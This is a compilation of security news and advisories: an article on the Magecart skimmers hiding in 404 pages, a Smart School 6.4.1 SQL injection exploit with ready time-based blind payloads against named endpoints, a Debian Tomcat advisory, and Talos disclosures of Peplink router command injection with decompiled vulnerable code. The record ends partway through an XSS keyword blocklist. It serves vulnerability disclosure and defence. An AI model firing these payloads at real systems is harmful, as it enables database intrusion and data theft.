The novel technique helps hide the cybercriminal campaign's efforts to steal credit card information from visitors to major websites, and it represents an evolution for Magecart.

The collection of cybercriminal groups behind the infamous Magecart payment-card theft campaigns have come up with a previously unseen technique to hide their credit card skimming code, escaping notice for several weeks and infecting major e-commerce sites, including significant brands in the food and retail industries.

The obfuscation technique hides JavaScript code in a comment in a targeted site's 404 default page, Akamai stated in an advisory on Oct. 9. Other pages on the site have been modified only slightly to include a call to a nonexistent folder ("icons"), which triggers the 404 error, thus fetching the malicious page.

The entire attack code is contained in a comment with a specific placeholder, so the attacker's script can retrieve it, Roman Lvovsky, a security researcher at Akamai, explained in the company's advisory.

"This concealment technique is highly innovative and something we haven't seen in previous Magecart campaigns," he said. "The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion."

**Hiding in 404 Pages: A Tactics Evolution**

Magecart attacks are a category of post-exploitation techniques for skimming credit card information and other user data from websites using obfuscated JavaScript, hijacking of forms, and malicious redirects. The embedded code often escapes notice by hiding in the complexity of modern websites, which rely heavily on third-party components, open source Web frameworks, and code obfuscated to protect intellectual property. Cybercriminals groups can hide their malicious content by either inserting it among the other obfuscated code or by compromising a third-party source of code or content.

Over the summer, for example, a Chinese-speaking threat group compromised Web-facing applications to skim credit card numbers in the Asia-Pacific region, and more recently, North American and Latin America, in a campaign dubbed "Silent Skimmer."

    

The payload hides the original credit-card form, overlaying it with a fake one. Source: Akamai

Similar to techniques hiding code in CSS files and images, adding code to the comments of a default 404 page escapes notice because many of the scanners used to detect attacks today were not designed to search such pages, says Ben Baryo, a cybersecurity researcher with Human Security, a bot- and fraud-protection service.

"While most scanners might report a missing resource, it’s likely that a 404 response won’t be analyzed," he says. "This detection evasion technique is mostly useful against synthetic scanners — which tend to ignore content in requests that aren’t returning 200 OK HTTP code — and manual inspections."

**Magecart Code Obfuscation & Overlays**

The modification to the default 404 pages are part of the Magecart campaign's efforts to deliver a payload — typically, the display of a fake form to collect credit card details — and maintain persistence. The cybercriminals used a fake form overlaying an original page's credit card information form to grab financial details from the targeted user, according to Akamai's advisory.

"When the user submits data into the attacker's fake form, an error is presented, the fake form is hidden, the original payment form is displayed, and the user is prompted to re-enter their payment details," Akamai's Lvovsky said, adding: "Submitting the fake form initiates an image network request to the attacker's C2 \[command-and-control\] server, carrying all the stolen personal and credit card information as a Base64-encoded string in the query parameter."

A 404 page is typically a first-party object — meaning that it resides on the same server as the home page and not a third-party service. This helps the attacker bypass some security measures, such as Content Security Policy (CSP) headers, he said.

Yet while the technique results in hard-to-discover modifications, it is not necessarily stealthy, says Human Security's Baryo. Because the 404 attack is kicked off by a call to the nonexistent "icons" resource, the technique could be considered noisy, which Magecart groups attempt to avoid.

"We haven’t seen this particular technique in the wild," he says. "We do not generally see other groups following this approach as this delivery method attracts unwanted attention as to why a nonexistent resource is being loaded on a particular page and by which script."

**Could PCI DSS Solve Magecart?**

The Payment Card Industry (PCI) Security Standards Council has attempted to solve the problem of Magecart attacks with the latest version of its Data Security Standard (DSS), which bolsters two security requirements to protect payment pages. Requirement 6 ("Develop and Maintain Secure Systems and Software") directs e-commerce sites to use secure development and maintenance to ensure that unauthorized code can't be injected into websites, while Requirement 11 ("Test Security of Systems and Networks Regularly") charges website owners to conduct ongoing monitoring of systems and networks to detect changes.

Online merchants — even ones that outsource all storage, processing, and transmission of account data to payment service providers — will have to abide by the PCI-DSS 4.0 requirements, says Jeff Zitomer, senior director of product management for Human Security.

"Modern websites ... source code at runtime from across the Internet to deliver critical business functionality," he says. "This forever-changing Nth-party code bypasses traditional security controls and enjoys nearly unlimited access in the browser, \[allowing\] attackers \[to\] exploit this attack surface through malicious script attacks."

The standard is currently considered a best practice but will become mandatory in early 2025.

Magecart Campaign Hijacks 404 Pages to Steal Data

Smart School version 6.4.1 suffers from multiple remote SQL injection vulnerabilities.

# Exploit Title: Smart School 6.4.1 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 28/09/2023  
# Vendor: QDocs - qdocs.net  
# Vendor Homepage: https://smart-school.in/  
# Software Link: https://demo.smart-school.in/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
# CVE: CVE-2023-5495  
# CWE: CWE-89 - CWE-74 - CWE-707

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.

Path: /course/filterRecords/

POST Parameter 'searchdata[0][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]

-------------------------------------------  
POST /course/filterRecords/ HTTP/1.1

searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3

-------------------------------------------

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]

Path: /course/filterRecords/

POST Parameter 'searchdata[0][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi

---  
Parameter: searchdata[0][title] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchfield] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchvalue] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][title] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][searchvalue] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z  
---

-------------------------------------------  
POST /course/filterRecords/ HTTP/1.1

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]  
-------------------------------------------

Path: /online_admission

---  
Parameter: MULTIPART email ((custom) POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--  
---

POST Parameter 'email' is vulnerable to SQLi

POST /online_admission HTTP/1.1

-----------------------------320375734131102816923531485385  
Content-Disposition: form-data; name="email"

*[SQLi]  
-----------------------------320375734131102816923531485385

[-] Done

Smart School 6.4.1 SQL Injection

Debian Linux Security Advisory 5522-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5522-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
October 10, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat9  
CVE ID         : CVE-2023-24998 CVE-2023-41080 CVE-2023-42795 CVE-2023-44487  
                 CVE-2023-45648

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2023-24998

    Denial of service. Tomcat uses a packaged renamed copy of Apache Commons  
    FileUpload to provide the file upload functionality defined in the Jakarta  
    Servlet specification. Apache Tomcat was, therefore, also vulnerable to the  
    Commons FileUpload vulnerability CVE-2023-24998 as there was no limit to  
    the number of request parts processed. This resulted in the possibility of  
    an attacker triggering a DoS with a malicious upload or series of uploads.

CVE-2023-41080

    Open redirect. If the ROOT (default) web application is configured to use  
    FORM authentication then it is possible that a specially crafted URL could  
    be used to trigger a redirect to an URL of the attackers choice.

CVE-2023-42795

    Information Disclosure. When recycling various internal objects, including  
    the request and the response, prior to re-use by the next request/response,  
    an error could cause Tomcat to skip some parts of the recycling process  
    leading to information leaking from the current request/response to the  
    next.

CVE-2023-44487

    DoS caused by HTTP/2 frame overhead (Rapid Reset Attack)

CVE-2023-45648

    Request smuggling. Tomcat did not correctly parse HTTP trailer headers. A  
    specially crafted, invalid trailer header could cause Tomcat to treat a  
    single request as multiple requests leading to the possibility of request  
    smuggling when behind a reverse proxy.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 9.0.43-2~deb11u7.

We recommend that you upgrade your tomcat9 packages.

For the detailed security status of tomcat9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmUlyBRfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRBnhAAk1o0EDLnX1zaS0Xnz9jybhd9XdXat1HwZXvV3XFRGVXu5+r2bKH+KQjU  
0GJ6koP3KDt10DrI8DzOq+9Msu0/TbPYAZKDHPjPYfcUqXRmwRrvTXtq5cbR5v3+  
JxgJhiqjQYb1DYiDLC5iU+6aryrZg2ma1i81lG5v8N1TDfaCHzbZiMpyeYEABkd7  
eKX3tzngoK9UaIgYVBxrjnM9bPRWnRFJRBMu/hs4VS6gxqzAaZT72Tcaf0Vf3t1s  
Es5IMgrhBC0Q2Amlm3N5z37p0nlhnJdNC3dAHetRCy92g9/KsjB/1BZfYY7rM8wV  
WwvB5WwQ0T4eRqKmc8yY86sUdfXkhPqz1oFDbnNgxtBjMm2z/of9pNEm+2NCpv9P  
3MpCIKsEWiGH8+uleGuFhAHoWeUYjDNJjH1di6+PYZoBaEJ8eiXct/THBt/0nvFR  
Nh6AFDqi1Hi5/GdPK71eFRDsXOwgSuRg1ZRJtJP1W/dYEiczP89l0CM04PwxEAn2  
dbE2ZCUQmIzQdng4OAHt+ze+QDini4HtoRJnQHq4P/QUIEQAE9C0hOIMMnrtpqIY  
A77Qa1bBVqDgLlhvSmpSrVigmfyXSpmtfc9G0KXcq5IAvr75jZ0PNuIk/VTyklYj  
e3g3nA1rbB1jlx6cvPqWBFItXW8800mJ0CXHb8EN8jKdB5BnooY=  
=6KYM  
-----END PGP SIGNATURE-----

Debian Security Advisory 5522-1

An OS command injection vulnerability exists in the data.cgi xfer_dns functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the data.cgi xfer\_dns functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Peplink Surf SOHO HW1 v6.3.5 (in QEMU)

**PRODUCT URLS**

Surf SOHO HW1 - https://www.peplink.com/products/soho-series-surf/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Surf series of SOHO routers is marketed as an entry-level router for use at home. It provides networking via USB cellular modems, ethernet and Wi-Fi. The device can host a VPN and supports Wi-Fi meshing.

The device hosts a web interface for administrative configuration. An OS command injection vulnerability exists in the handling of requests destined for the /cgi-bin/MANGA/data.cgi endpoint, which are intended to interact with the DNS zone transfer operations. This endpoint is accessible only after successfully authenticating as a user with write privileges on the device. The HTTP POST request must have its parameter option set to xfer_dns and parameter step set to view_domain in order to reach the vulnerable code.

The vulnerable function is located in the file data.cgi at offset 0x491814 in firmware version 6.3.5, and we refer to it as view_domain. In order to reach it, the request first transits through a dispatcher function located at 0x491f14, which we refer to as xfer_dns. Annotated decompilations of the dispatcher function and vulnerable function are included for reference.

    int xfer_dns()
    {
        char *xfer_session = cgi_safe_param("xfer_session");
        
        // [1] This must be set to `view_domain` in order to be dispatched to the vulnerable function
        char* step = cgi_safe_param("step");  
    
        if (xfer_session[0] == 0)
        {
            fprintf(*stdout, "<%s>%s</%s>", "error", "Missing session", "error");
            return 0;
        }
        
        // [2] Observe that some parameters are subject to (a degree of) scrutiny and validation before use
        if (contains_dangerous_shell_characters(xfer_session) == 0)  
        {
            fprintf(*stdout, "<%s>%s</%s>", "error", "Unauthorized session", "error");
            return 0;
        }
    
        // [3] Dispatch code follows
        if (strcmp(step, "zone_transfer") == 0)
        {
            return zone_transfer(xfer_session);
        }
        if (strcmp(step, "status") == 0)
        {
            return status(xfer_session);
        }
        if (strcmp(step, "view_domain") == 0)
        {
            return view_domain(xfer_session, cgi_safe_param("domain"));
        }
        if (strcmp(step, "import") == 0)
        {
            return import("session");
        }
        fprintf(*stdout, "<%s>%s</%s>", "error", "Unknown step", "error");
    }
    

The dispatch functionality is relatively straightforward and is included to show that at [2] certain parameters are subject to a limited degree of scrutiny. The implementation of what we refer to as contains_dangerous_shell_characters is limited to checking whether the parameter contains grave mark, double quote or dollar sign characters. At [3] the dispatcher hands control off to the target function, which in this case is view_domain.

    int view_domain(char* xfer_session, char* domain)
    {
        char cmd[0x400] = {0};
        
        // [4] Craft the command using the unchecked, attacker-controlled domain parameter
        snprintf(&cmd, 0x400, "/usr/local/ilink/bin/dns_import view \"%s\" \"%s\" 2>/dev/null", xfer_session, domain);
        
        // [5] Execute the command with root privileges
        FILE* stream = popen(&cmd, "r");
        
        ...  // The remainder of this function is responsible for parsing the output of dns_import and is unrelated to this vulnerability
        }
    }
    

Observe that when dispatched (at [3]) the HTTP POST param domain is passed as the domain parameter to view_domain. An OS command is crafted at [4] by directly injecting the attacker-controlled domain value. Finally, at [5], the command is executed with root privileges. A properly formatted request can escape the intended command and execute arbitrary commands.

**TIMELINE**

2023-06-26 - Initial Vendor Contact  
2023-06-27 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Matt Wiseman of Cisco Talos.

CVE-2023-34356: TALOS-2023-1778 || Cisco Talos Intelligence Group

An OS command injection vulnerability exists in the admin.cgi USSD_send functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the admin.cgi USSD\_send functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Peplink Surf SOHO HW1 v6.3.5 (in QEMU)

**PRODUCT URLS**

Surf SOHO HW1 - https://www.peplink.com/products/soho-series-surf/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Surf series of SOHO routers is marketed as an entry-level router for use at home. It provides networking via USB cellular modems, ethernet and Wi-Fi. The device can host a VPN and supports Wi-Fi meshing.

The device hosts a web interface for administrative configuration. An OS command injection vulnerability exists in the handling of requests destined for the /cgi-bin/MANGA/admin.cgi endpoint that are intended to interact with the GSM module. This endpoint is accessible only after successfully authenticating as a user with write privileges on the device. The HTTP POST request must have a parameter, section, whose value is set to USSD_send in order to reach the vulnerable code. This vulnerability only impacts systems with a functioning GSM module.

The vulnerable function is located in the file admin.cgi at offset 0x4b124c in firmware version 6.3.5, and we refer to it as USSD_send. An annotated decompilation of the function is included for reference.

    int USSD_send(taglist_t* taglist) {
        char cmd[0x400] = {0};
        FILE* stream;
    
        int conn_id = strtol(cgi_safe_param("conn_id"), 0, 10);
        int sim_id = strtol(cgi_safe_param("sim_id"), 0, 10);
        
        char* ussd_code = cgi_safe_param("ussd_code");  // [1] Extract ussd_code parameter into ussd_code variable
        char* status;
    
        if (is_wan_connection_available(taglist, conn_id) == 0)  // [2] Device must have functioning GSM module
        {
            status = "Selected WAN connection is not available at this moment.";
            xml_error(&status);
            return 1;
        } else {
            snprintf(&cmd, 0x400, "mdstatus -W%d -Ci", conn_id);
            stream = popen(&cmd, "r");
            ... // [3] Perform some data extraction on response
    
            snprintf(&cmd, 0x400, "mdstatus -W%d -u"%d,%s"", conn_id, sim_id, ussd_code);  // [4] Craft the command using unchecked, attacker-controlled ussd_code parameter
            stream = popen(&cmd, "r");  // [5] Execute the command with root privileges
            ... // [6] Perform some data extraction and business logic on response
        }
    
        return 0;
    }
    

Observe at [1] that a pointer to the HTTP POST param ussd_code is placed into the ussd_code stack variable. If the network status check at [2] is passed, the command is crafted at [4] by directly injecting the attacker-controlled value. Finally, at [5], the command is executed with root privileges. A properly formatted request can escape the intended command and execute arbitrary commands.

**TIMELINE**

2023-06-26 - Initial Vendor Contact  
2023-06-27 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Matt Wiseman of Cisco Talos.

CVE-2023-27380: TALOS-2023-1780 || Cisco Talos Intelligence Group

An OS command injection vulnerability exists in the admin.cgi MVPN_trial_init functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the admin.cgi MVPN\_trial\_init functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Peplink Surf SOHO HW1 v6.3.5 (in QEMU)

**PRODUCT URLS**

Surf SOHO HW1 - https://www.peplink.com/products/soho-series-surf/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Surf series of SOHO routers is marketed as an entry-level router for use at home. It provides networking via USB cellular modems, ethernet and Wi-Fi. The device can host a VPN and supports Wi-Fi meshing.

The device hosts a webserver for configuration and control.

An OS command injection vulnerability exists in the handling of requests destined for the /cgi-bin/MANGA/admin.cgi endpoint, which are intended to initialize a trial of the MVPN feature. This endpoint is accessible only after successfully authenticating as a user with write privileges on the device. The vulnerability can only be reached if the device has been configured to use either mvpn_smoothing or mvpn_bonding. The HTTP POST request must have a parameter, section, with a value set to MVPN_trial_init in order to reach the vulnerable code.

The vulnerable function is located in the file admin.cgi at offset 0x4bb7b4 in firmware version 6.3.5, and we refer to it as MVPN_trial_init. An annotated decompilation of the function is included for reference.

    int MVPN_trial_init()
    {
      char debug[0x20] = {0};    
      char cmd[0x400] = {0};
    
      int is_llb = is_support_llb_trial();
      int mvpn_support_mode = get_mvpn_support_mode();
      char* trial_type;
    
      snprintf(&debug, 0x20, "%s", cgi_safe_param("debug"));  // [1] Command injection payload must fit within 0x20 bytes
    
      if (mvpn_support_mode == BONDING) {
        if (is_llb) {
            trial_type = "bonding_llb";
        } else {
            trial_type = "bonding";
        }
      }
      
      if (mvpn_support_mode == SMOOTHING) {
        if (is_llb) {
            trial_type = "smoothing_llb";
        } else {
            trial_type = "smoothing";
        }
      }
      
      if (mvpn_support_mode == BONDING || mvpn_support_mode == SMOOTHING) {  // [2] Smoothing or Bonding must be configured for MVPN in order to reach vulnerable code
        snprintf(cmd, 0x400, "/usr/local/ilink/bin/mvpn_trial_init %s %s > /dev/null 2>&1", trial_type, &debug);  // [3] Craft a command using attacker-controlled `debug` value
        if (system(cmd)) == 0) {  // [4] Execute the crafted command as root
            return 1;
        }
      }
      
      xml_error("Unable to start trial. Please try again later.");
      return 0;
    }
    

Observe at [1] that the first 0x20 bytes of the HTTP POST param debug are extracted into the debug stack variable. If the configuration check at [2] is passed, the command is crafted at [3] by directly injecting the attacker-controlled value. Finally, at [4], the command is executed with root privileges. A properly formatted request can escape the intended command and execute arbitrary commands.

**TIMELINE**

2023-06-26 - Initial Vendor Contact  
2023-06-27 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Matt Wiseman of Cisco Talos.

CVE-2023-28381: TALOS-2023-1779 || Cisco Talos Intelligence Group

An OS command injection vulnerability exists in the api.cgi cmd.mvpn.x509.write functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability is specifically for the `system` call in the file `/web/MANGA/cgi-bin/api.cgi` for firmware version 6.3.5 at offset 0x4bddb8.

**SUMMARY**

An OS command injection vulnerability exists in the api.cgi cmd.mvpn.x509.write functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Peplink Surf SOHO HW1 v6.3.5 (in QEMU)

**PRODUCT URLS**

Surf SOHO HW1 - https://www.peplink.com/products/soho-series-surf/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Surf series of SOHO routers is marketed as an entry-level router for use at home. It provides networking via USB cellular modems, ethernet and Wi-Fi. The device can host a VPN and supports Wi-Fi meshing.

The device hosts a web interface for administrative configuration. An OS command injection vulnerability exists in the handling of requests destined for the /cgi-bin/MANGA/api.cgi endpoint which are intended to interact with the x509 certificate configuration feature. This endpoint is accessible only after successfully authenticating as a user with write privileges on the device. The HTTP POST request must have a parameter, func, whose value is set to cmd.mvpn.x509.write in order to reach the vulnerable code.

The vulnerable function is located in the file api.cgi at offset 0x4bdd1c in firmware version 6.3.5, and is referred to as xml_submit_x509_overwrite_mvpn_self. This function is called from the API handler associated with cmd.mvpn.x509.write, which simply extracts three HTTP POST parameters (cert, key, pw) and passes them to the vulnerable function. An annotated decompilation of the function is included for reference.

    int xml_submit_x509_overwrite_mvpn_self(char* cert, char* key, char* pw)
    {
        char cmd[0x400] = {0};
        int result = 0;
        if (cert == 0)
        {
            result = 9;
        } else {
            result = 9;
            if (key != 0 && pw != 0)
            {
                snprintf(&cmd, 0x400, "/usr/local/ilink/bin/certificate_helper check_pk %s %s \"%s\" >/dev/null 2>&1", cert, key, __sh_escape(pw));  // [1] Craft an OS command using the unchecked, attacker-controlled cert and key parameters
                if (system(&var_418) != 0) {  // [2] Execute the command with root privileges
                    return 2;
                }
    
                snprintf(&cmd, 0x400, "/usr/local/ilink/bin/certificate_helper save_self_cert %s %s \"%s\" > /dev/null 2>&1", cert, key, __sh_escape(pw));  // [3] Craft another OS command using the unchecked, attacker-controlled cert and key parameters
                result = 0 < system(&cmd) ? 1 : 0;  // [4] Execute another command with root privileges
            }
        } 
        return result;
    }
    

**CVE-2023-35193 - check\_pk**

Observe at [1] that an OS command is crafted using the attacker-controlled cert and key parameters. Of interest is that the pw parameter is checked prior to usage. The command is executed at [2] with root privileges.

**CVE-2023-35194 - save\_self\_cert**

If the result of the check_pk step is successful, the same thing occurs again at [3] and [4]. A properly formatted request can escape the intended command and execute arbitrary commands.

**TIMELINE**

2023-06-26 - Initial Vendor Contact  
2023-06-27 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Matt Wiseman of Cisco Talos.

CVE-2023-35193: TALOS-2023-1782 || Cisco Talos Intelligence Group

A stored cross-site scripting (XSS) vulnerability exists in the upload_brand.cgi functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to execution of arbitrary javascript in another user's browser. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

A stored cross-site scripting (XSS) vulnerability exists in the upload\_brand.cgi functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to execution of arbitrary javascript in another user’s browser. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Peplink Surf SOHO HW1 v6.3.5 (in QEMU)

**PRODUCT URLS**

Surf SOHO HW1 - https://www.peplink.com/products/soho-series-surf/

**CVSSv3 SCORE**

3.4 - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N

**CWE**

CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

**DETAILS**

The Surf series of SOHO routers is marketed as an entry-level router for use at home. It provides networking via USB cellular modems, ethernet and Wi-Fi. The device can host a VPN and supports Wi-Fi meshing.

The device hosts a web interface for administrative configuration. A stored XSS vulnerability exists in the handling of requests destined for the /cgi-bin/MANGA/upload_brand.cgi endpoint which are intended to interact with the logo and branding management feature. This endpoint is accessible only after successfully authenticating as a user with write privileges on the device. The HTTP POST request must have a parameter, mode, whose value is set to api in order to reach the vulnerable code. The OEM of the device must be VISLINK, or the vulnerable brand upload feature will be disabled and inaccessible.

The vulnerable function is located in the file upload_brand.cgi at offset 0x40d390 in firmware version 6.3.5, and we refer to it as handle_brand_upload. An annotated decompilation of the function is included for reference.

    #define NUM_BLOCKLIST 7
    #define LEN_BLOCKLIST 100
    char global_blocklist[NUM_BLOCKLIST][LEN_BLOCKLIST] = {
        "javascript",
        "<script",
        "<object",
        "<applet",
        "<embed",
        "<form",
        "\0"
    };
